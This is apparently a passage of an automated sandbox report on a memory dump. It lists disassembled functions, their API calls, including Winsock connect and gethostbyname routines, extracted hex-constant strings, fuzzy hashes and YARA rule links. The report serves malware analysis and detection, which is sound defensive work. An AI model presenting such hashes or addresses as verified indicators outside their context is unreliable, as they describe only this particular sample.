B05688C2B3E6C1FD, xrefs: 0040CFCF, 0040CFE0, 0040CFFA
A09E667F3BCC908B, xrefs: 0040CE5A, 0040CE68, 0040CE79
54FF53A5F1D36F1C, xrefs: 0040CF35, 0040CF40, 0040CF51
10E527FADE682D1D, xrefs: 0040CF7C, 0040CF87, 0040CF9B
C6EF372FE94F82BE, xrefs: 0040CEEE, 0040CEF9, 0040CF0A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: d65380b80bb11d9647ed62b508e7ba025e9032f5b9c34607fe7b6e00e2352478
Instruction ID: f839367711f615799f5e0509e18bd12e6726a05653990ba8fbeab15e2869408d
Opcode Fuzzy Hash: d65380b80bb11d9647ed62b508e7ba025e9032f5b9c34607fe7b6e00e2352478
Instruction Fuzzy Hash: 98519571C052589EDB54EBA9D941BEDBBB4EF45300F1081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040AED8, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040AEDD
_strlen.LIBCMT ref: 0040AF05

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 0040AF4F
_strlen.LIBCMT ref: 0040AF96
_strlen.LIBCMT ref: 0040AFDD
_strlen.LIBCMT ref: 0040B027
_strlen.LIBCMT ref: 0040B086

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 0040AF3A, 0040AF45, 0040AF56
B05688C2B3E6C1FD, xrefs: 0040B062, 0040B073, 0040B08D
A09E667F3BCC908B, xrefs: 0040AEED, 0040AEFB, 0040AF0C
54FF53A5F1D36F1C, xrefs: 0040AFC8, 0040AFD3, 0040AFE4
10E527FADE682D1D, xrefs: 0040B00F, 0040B01A, 0040B02E
C6EF372FE94F82BE, xrefs: 0040AF81, 0040AF8C, 0040AF9D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 9472fd928ff903b6641fd4ac30370a1b044210b4e08a5a1a431ee57ffa8c1a1c
Instruction ID: e9f6f7956efab9e7229bf61a9d57535a13a71033c5bb0dfe835de08ccd761a6a
Opcode Fuzzy Hash: 9472fd928ff903b6641fd4ac30370a1b044210b4e08a5a1a431ee57ffa8c1a1c
Instruction Fuzzy Hash: B151A271C052589EDB50EBA9DD41BEDBBB4EF45300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402F3C, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F41
_strlen.LIBCMT ref: 00402F69

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 00402FB3
_strlen.LIBCMT ref: 00402FFA
_strlen.LIBCMT ref: 00403041
_strlen.LIBCMT ref: 0040308B
_strlen.LIBCMT ref: 004030EA

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 00402F9E, 00402FA9, 00402FBA
B05688C2B3E6C1FD, xrefs: 004030C6, 004030D7, 004030F1
A09E667F3BCC908B, xrefs: 00402F51, 00402F5F, 00402F70
54FF53A5F1D36F1C, xrefs: 0040302C, 00403037, 00403048
10E527FADE682D1D, xrefs: 00403073, 0040307E, 00403092
C6EF372FE94F82BE, xrefs: 00402FE5, 00402FF0, 00403001

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: d5c8dd1969650bd11c26226a3f0460a008f03349d5639113059f5248400357c0
Instruction ID: a965084cc4c039c97f22ec3dadf0392a30e14cc4e4a1b92248dbdecf5937b509
Opcode Fuzzy Hash: d5c8dd1969650bd11c26226a3f0460a008f03349d5639113059f5248400357c0
Instruction Fuzzy Hash: 71519371C052589EDB50EBA9DD41BEDBBB4EF55300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409477, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040947C
_strlen.LIBCMT ref: 004094A4

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 004094EE
_strlen.LIBCMT ref: 00409535
_strlen.LIBCMT ref: 0040957C
_strlen.LIBCMT ref: 004095C6
_strlen.LIBCMT ref: 00409625

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 004094D9, 004094E4, 004094F5
B05688C2B3E6C1FD, xrefs: 00409601, 00409612, 0040962C
A09E667F3BCC908B, xrefs: 0040948C, 0040949A, 004094AB
54FF53A5F1D36F1C, xrefs: 00409567, 00409572, 00409583
10E527FADE682D1D, xrefs: 004095AE, 004095B9, 004095CD
C6EF372FE94F82BE, xrefs: 00409520, 0040952B, 0040953C

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: e5a58ab576a3362eb1f42947c2d71e993a7520984e79012b01847fe4d4969d9a
Instruction ID: 7bd29fcc501d56f4281ad84000988f70c2641a8a0405d620b4bd4c0fbf15461f
Opcode Fuzzy Hash: e5a58ab576a3362eb1f42947c2d71e993a7520984e79012b01847fe4d4969d9a
Instruction Fuzzy Hash: 4451A371C052589EDB50EBA9D941BEDBBB4EF45300F2081AEE518F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4C5, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040B4CA
_strlen.LIBCMT ref: 0040B4F2

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 0040B53C
_strlen.LIBCMT ref: 0040B583
_strlen.LIBCMT ref: 0040B5CA
_strlen.LIBCMT ref: 0040B614
_strlen.LIBCMT ref: 0040B673

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 0040B527, 0040B532, 0040B543
B05688C2B3E6C1FD, xrefs: 0040B64F, 0040B660, 0040B67A
A09E667F3BCC908B, xrefs: 0040B4DA, 0040B4E8, 0040B4F9
54FF53A5F1D36F1C, xrefs: 0040B5B5, 0040B5C0, 0040B5D1
10E527FADE682D1D, xrefs: 0040B5FC, 0040B607, 0040B61B
C6EF372FE94F82BE, xrefs: 0040B56E, 0040B579, 0040B58A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 56b442065e37f2932f17019b031a73a578f800e6ab602444edf57420f4e3adb4
Instruction ID: b65b756b29263e9867de9677f4c68d28238f674d42f6cb30e6c92a3ced2b383d
Opcode Fuzzy Hash: 56b442065e37f2932f17019b031a73a578f800e6ab602444edf57420f4e3adb4
Instruction Fuzzy Hash: EC519371C052589EDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA45, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040BA4A
_strlen.LIBCMT ref: 0040BA72

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 0040BABC
_strlen.LIBCMT ref: 0040BB03
_strlen.LIBCMT ref: 0040BB4A
_strlen.LIBCMT ref: 0040BB94
_strlen.LIBCMT ref: 0040BBF3

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 0040BAA7, 0040BAB2, 0040BAC3
B05688C2B3E6C1FD, xrefs: 0040BBCF, 0040BBE0, 0040BBFA
A09E667F3BCC908B, xrefs: 0040BA5A, 0040BA68, 0040BA79
54FF53A5F1D36F1C, xrefs: 0040BB35, 0040BB40, 0040BB51
10E527FADE682D1D, xrefs: 0040BB7C, 0040BB87, 0040BB9B
C6EF372FE94F82BE, xrefs: 0040BAEE, 0040BAF9, 0040BB0A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: a8d3bc9bcda9de6a2ffe52fde1f816639400300d7856ecf0f4b85cf64a9a5328
Instruction ID: 3f7bd80854d7166bbe6dea3f2997e76b20b6e763fc72d676ee3165c53d6a19d9
Opcode Fuzzy Hash: a8d3bc9bcda9de6a2ffe52fde1f816639400300d7856ecf0f4b85cf64a9a5328
Instruction Fuzzy Hash: 9051A271D052589EDB50EBA9D941BEDBBB4EF45300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403A9E, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00403AA3
_strlen.LIBCMT ref: 00403ACB

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 00403B15
_strlen.LIBCMT ref: 00403B5C
_strlen.LIBCMT ref: 00403BA3
_strlen.LIBCMT ref: 00403BED
_strlen.LIBCMT ref: 00403C4C

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 00403B00, 00403B0B, 00403B1C
B05688C2B3E6C1FD, xrefs: 00403C28, 00403C39, 00403C53
A09E667F3BCC908B, xrefs: 00403AB3, 00403AC1, 00403AD2
54FF53A5F1D36F1C, xrefs: 00403B8E, 00403B99, 00403BAA
10E527FADE682D1D, xrefs: 00403BD5, 00403BE0, 00403BF4
C6EF372FE94F82BE, xrefs: 00403B47, 00403B52, 00403B63

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: fad4a6227e245de09d880f29290466b03fa40ac544eeffc3f1e93ddbaf6ec05a
Instruction ID: be3e1a0eaa78c2038b25a0dc2acdf51ba153f3ad33ed1280567aa4fe23bf18ec
Opcode Fuzzy Hash: fad4a6227e245de09d880f29290466b03fa40ac544eeffc3f1e93ddbaf6ec05a
Instruction Fuzzy Hash: D1518371C052589EDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CFE, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401D03
_strlen.LIBCMT ref: 00401D2B

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 00401D75
_strlen.LIBCMT ref: 00401DBC
_strlen.LIBCMT ref: 00401E03
_strlen.LIBCMT ref: 00401E4D
_strlen.LIBCMT ref: 00401EAC

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 00401D60, 00401D6B, 00401D7C
B05688C2B3E6C1FD, xrefs: 00401E88, 00401E99, 00401EB3
A09E667F3BCC908B, xrefs: 00401D13, 00401D21, 00401D32
54FF53A5F1D36F1C, xrefs: 00401DEE, 00401DF9, 00401E0A
10E527FADE682D1D, xrefs: 00401E35, 00401E40, 00401E54
C6EF372FE94F82BE, xrefs: 00401DA7, 00401DB2, 00401DC3

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 0787b6d2f8d433d9804d3b8ea5b514f801de4333742cb515375f83f3ec98adaa
Instruction ID: ea970fe2a051cab5de8e5937a1900e0fcfe18c7d1ca3956626325157ff5f2455
Opcode Fuzzy Hash: 0787b6d2f8d433d9804d3b8ea5b514f801de4333742cb515375f83f3ec98adaa
Instruction Fuzzy Hash: 18516071C05258DEDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00409D42, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409D47
_strlen.LIBCMT ref: 00409D6F

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 00409DB9
_strlen.LIBCMT ref: 00409E00
_strlen.LIBCMT ref: 00409E47
_strlen.LIBCMT ref: 00409E91
_strlen.LIBCMT ref: 00409EF0

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 00409DA4, 00409DAF, 00409DC0
B05688C2B3E6C1FD, xrefs: 00409ECC, 00409EDD, 00409EF7
A09E667F3BCC908B, xrefs: 00409D57, 00409D65, 00409D76
54FF53A5F1D36F1C, xrefs: 00409E32, 00409E3D, 00409E4E
10E527FADE682D1D, xrefs: 00409E79, 00409E84, 00409E98
C6EF372FE94F82BE, xrefs: 00409DEB, 00409DF6, 00409E07

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$DeallocateH_prolog__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 1696903463-4081904993
Opcode ID: 8581c2995d265934e1ac94a2ce8bff2b1af82060fb9c8b4d92e9ef4249cc7bf5
Instruction ID: d820eb5c453758296bb2266e8992b3e2f92cb9812aaa01ae0b854bb01681fa8a
Opcode Fuzzy Hash: 8581c2995d265934e1ac94a2ce8bff2b1af82060fb9c8b4d92e9ef4249cc7bf5
Instruction Fuzzy Hash: A251B271C052589EDB50EBA9D941BEDBBF4EF45304F2081AEE508F7242EB781E44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00696430, Relevance: 19.7, APIs: 2, Strings: 9, Instructions: 414COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,000000D9,?,?), ref: 006964E0
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,000000D9,?,?), ref: 00696503

Strings

File: , xrefs: 006965C5
Assertion failed!, xrefs: 0069645A
(Press Retry to debug the application - JIT must be enabled), xrefs: 0069686B
..., xrefs: 0069657C, 006966C3, 0069680F, 006968BE, 00696900, 00696933
Line: , xrefs: 00696713
<program name unknown>, xrefs: 0069650D
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 0069683D
Program: , xrefs: 0069649D
Expression: , xrefs: 00696791

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
API String ID: 4146042529-1508414584
Opcode ID: bd609859ea20a486280a04a4791418c150178b1cf9f2b15d8abaf45191268842
Instruction ID: 4859052c459d8a02cf1cac4d5456087f6971aff21903e24fe749f3c83e5bcecf
Opcode Fuzzy Hash: bd609859ea20a486280a04a4791418c150178b1cf9f2b15d8abaf45191268842
Instruction Fuzzy Hash: F2D10CB1A4030A6BDF24AE24CD85FFA73BEEF64704F044599FC09A2645F6349E528E51

Uniqueness

Uniqueness Score: -1.00%

Function 006AA1ED, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 006AA231

Part of subcall function 006A958B: _free.LIBCMT ref: 006A95A8
Part of subcall function 006A958B: _free.LIBCMT ref: 006A95BA
Part of subcall function 006A958B: _free.LIBCMT ref: 006A95CC
Part of subcall function 006A958B: _free.LIBCMT ref: 006A95DE
Part of subcall function 006A958B: _free.LIBCMT ref: 006A95F0
Part of subcall function 006A958B: _free.LIBCMT ref: 006A9602
Part of subcall function 006A958B: _free.LIBCMT ref: 006A9614
Part of subcall function 006A958B: _free.LIBCMT ref: 006A9626
Part of subcall function 006A958B: _free.LIBCMT ref: 006A9638
Part of subcall function 006A958B: _free.LIBCMT ref: 006A964A
Part of subcall function 006A958B: _free.LIBCMT ref: 006A965C
Part of subcall function 006A958B: _free.LIBCMT ref: 006A966E
Part of subcall function 006A958B: _free.LIBCMT ref: 006A9680

_free.LIBCMT ref: 006AA226

Part of subcall function 0069742F: HeapFree.KERNEL32(00000000,00000000), ref: 00697445
Part of subcall function 0069742F: GetLastError.KERNEL32(?,?,006A9CF8,?,00000000,?,00000000,?,006A9F9C,?,00000007,?,?,006AA385,?,?), ref: 00697457

_free.LIBCMT ref: 006AA248
_free.LIBCMT ref: 006AA25D
_free.LIBCMT ref: 006AA268
_free.LIBCMT ref: 006AA28A
_free.LIBCMT ref: 006AA29D
_free.LIBCMT ref: 006AA2AB
_free.LIBCMT ref: 006AA2B6
_free.LIBCMT ref: 006AA2EE
_free.LIBCMT ref: 006AA2F5
_free.LIBCMT ref: 006AA312
_free.LIBCMT ref: 006AA32A

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: d86c3d945633648a0dc0cde3a1acee7beff3f4bf0a0218c8f8eafb557f1e6794
Instruction ID: 252afd2d7d45e23f16069e07bc548d3084791333cfb77263bed91f5bc8a86aa2
Opcode Fuzzy Hash: d86c3d945633648a0dc0cde3a1acee7beff3f4bf0a0218c8f8eafb557f1e6794
Instruction Fuzzy Hash: B83191316043019FEF61BAB8D805B9AB7EBEF02710F54841EE548D7652DF31ADA1CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0041839A, Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 312networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0041839E

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 004183A9
WSAStartup.WS2_32(00000101,?), ref: 004183F0
gethostbyname.WS2_32(?), ref: 0041850F
htons.WS2_32(00000000), ref: 00418678

Part of subcall function 0044A710: __EH_prolog.LIBCMT ref: 0044A715

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

Part of subcall function 0041D156: __Thrd_sleep.LIBCPMT ref: 0041D1E9

closesocket.WS2_32(00000000), ref: 00418787

Strings

q:\, xrefs: 00418699
D, xrefs: 0041870C
Y, xrefs: 00418442
Z, xrefs: 00418564
>, xrefs: 00418705

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$DeallocateExceptionException@8RaiseStartupThrd_sleepThrowclosesocketgethostbynamehtonsstd::_
String ID: >$D$Y$Z$q:\
API String ID: 1674679543-3433793917
Opcode ID: 99a7c5e1c7c54cfddceb425eb83ebb4a8548476b97376af5be9c24e1874bb9d5
Instruction ID: 35b9b44382151ecbdcc3e05d1a6b10460cee50d629e161814eff3a5c7a046554
Opcode Fuzzy Hash: 99a7c5e1c7c54cfddceb425eb83ebb4a8548476b97376af5be9c24e1874bb9d5
Instruction Fuzzy Hash: 74C1D07090034CEEEB10DFA8DC45BEDBBB8EF15304F10416EE905A72A2EB785A85CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00418CC6, Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 310networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00418CCA

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 00418CD5
gethostbyname.WS2_32(?), ref: 00418D09
_strlen.LIBCMT ref: 00418E26
htons.WS2_32(00000000), ref: 00418E5F
connect.WS2_32(?,?,00000010), ref: 00418F4F
closesocket.WS2_32(?), ref: 00418FFE

Strings

q, xrefs: 0041906D
r, xrefs: 00418D57
m, xrefs: 00419066
]:\, xrefs: 00418EA3

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8H_prologRaiseThrow_strlenclosesocketconnectgethostbynamehtons
String ID: ]:\$m$q$r
API String ID: 2068986165-1567834525
Opcode ID: 6b85332f6222d9b79a1370b7d33fae3ccfb0c35eae4d34a71a629d60d45a1671
Instruction ID: 2d9bc025682d35bed8f24ea70904041e7ba9f01175c9b8762ca20ede936a9fa8
Opcode Fuzzy Hash: 6b85332f6222d9b79a1370b7d33fae3ccfb0c35eae4d34a71a629d60d45a1671
Instruction Fuzzy Hash: 56C11271900348AEDB10DFA8D8817EEBBB9EF58304F10416EE509A72A1EB785EC5CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004B440C, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B4411
__CxxThrowException@8.LIBVCRUNTIME ref: 004B45D4

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

std::exception::exception.LIBCONCRT ref: 004B45E3
std::exception::exception.LIBCONCRT ref: 004B4611
std::exception::exception.LIBCONCRT ref: 004B45A3

Part of subcall function 0040F331: ___std_exception_copy.LIBVCRUNTIME ref: 0040F358

std::exception::exception.LIBCONCRT ref: 004B4635

Strings

expected attribute name, xrefs: 004B462D
expected ' or ", xrefs: 004B459B, 004B45DE
]sB, xrefs: 004B45BD, 004B45FD
attribute && !attribute->parent(), xrefs: 004B44A6
expected =, xrefs: 004B4609

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::exception::exception$ExceptionException@8H_prologRaiseThrow___std_exception_copy
String ID: ]sB$attribute && !attribute->parent()$expected ' or "$expected =$expected attribute name
API String ID: 4183761955-3982853885
Opcode ID: bf1c098992a9234b3976b60dafabefccaf714d8a5636b969210f1e993cad812e
Instruction ID: 5c87995e05de95a7ebcdb8ece5e865599b5c18367c0d559d077718e556a72b88
Opcode Fuzzy Hash: bf1c098992a9234b3976b60dafabefccaf714d8a5636b969210f1e993cad812e
Instruction Fuzzy Hash: 1F71ADB0904605DFCB24CF64C0947EABFF0BF59314F2441AED495AB742C3789A4ADB69

Uniqueness

Uniqueness Score: -1.00%

Function 004B15E8, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 137COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B15ED

Part of subcall function 004B2FC2: __EH_prolog.LIBCMT ref: 004B2FC7

std::exception::exception.LIBCONCRT ref: 004B163C
__CxxThrowException@8.LIBVCRUNTIME ref: 004B166A
std::exception::exception.LIBCONCRT ref: 004B16A0
std::exception::exception.LIBCONCRT ref: 004B1714
std::exception::exception.LIBCONCRT ref: 004B1774

Strings

expected element name or prefix, xrefs: 004B1634
expected element local name, xrefs: 004B1698
expected >, xrefs: 004B170C, 004B176C
]sB, xrefs: 004B1653
Ltm, xrefs: 004B1661, 004B169D

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::exception::exception$H_prolog$Exception@8Throw
String ID: Ltm$]sB$expected >$expected element local name$expected element name or prefix
API String ID: 1492573370-3363373362
Opcode ID: 8ee9258233df381037123bc0141be3269bc28f98fe406d1b0ae333051bbbcfae
Instruction ID: 46814a947683c0c4c2a0cd57a4a4caecfe55f8fe3f1ccb444bc1f2da2610baef
Opcode Fuzzy Hash: 8ee9258233df381037123bc0141be3269bc28f98fe406d1b0ae333051bbbcfae
Instruction Fuzzy Hash: 0551D2B09042548FDF24DF68C464BEABBF0BF19304F5441AED48167762D77C1A06DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00417EF3, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 336networkCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00417EF7

Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D

__EH_prolog.LIBCMT ref: 00417F02
gethostbyname.WS2_32(?), ref: 00417F39
htons.WS2_32(00000000), ref: 00418070
connect.WS2_32(00000000,?,00000010), ref: 004181BC
_strlen.LIBCMT ref: 004181EC
closesocket.WS2_32(00000000), ref: 00418203

Strings

Disconnected, xrefs: 004181E7, 004181F3
!, xrefs: 0041828F
Q, xrefs: 00418144

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8H_prologRaiseThrow_strlenclosesocketconnectgethostbynamehtons
String ID: !$Disconnected$Q
API String ID: 2068986165-2566322903
Opcode ID: 8185fae0cdb3d243782228511953f7551699d9a4cee784e1879175ce86791420
Instruction ID: a520ae03505f43466df6a143b79721f80eba07725f595141faa3ecfdd5fbf314
Opcode Fuzzy Hash: 8185fae0cdb3d243782228511953f7551699d9a4cee784e1879175ce86791420
Instruction Fuzzy Hash: 8CD1F17190064CAEDB11DFA8DC41BEDBBB8FF15304F10426EF905A71A2EB785A85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401346, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC

_strlen.LIBCMT ref: 0040136F
_strlen.LIBCMT ref: 004013B6
_strlen.LIBCMT ref: 004013FD
_strlen.LIBCMT ref: 00401447
_strlen.LIBCMT ref: 004014A6

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

B67AE8584CAA73B2, xrefs: 0040135A, 00401365, 00401376
B05688C2B3E6C1FD, xrefs: 00401482, 00401493, 004014AD
54FF53A5F1D36F1C, xrefs: 004013E8, 004013F3, 00401404
10E527FADE682D1D, xrefs: 0040142F, 0040143A, 0040144E
C6EF372FE94F82BE, xrefs: 004013A1, 004013AC, 004013BD

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _strlen$Deallocate__onexitstd::_
String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
API String ID: 2266438879-1924342159
Opcode ID: 54c2900db5003babd0a57e679f8163bfb2ac5ed3e08f6ce3539752ee5aef9bba
Instruction ID: 4028b5a8a66f86bf5b49092ba6f00bdf269293dda4abb475b3cfc4da176d3ada
Opcode Fuzzy Hash: 54c2900db5003babd0a57e679f8163bfb2ac5ed3e08f6ce3539752ee5aef9bba
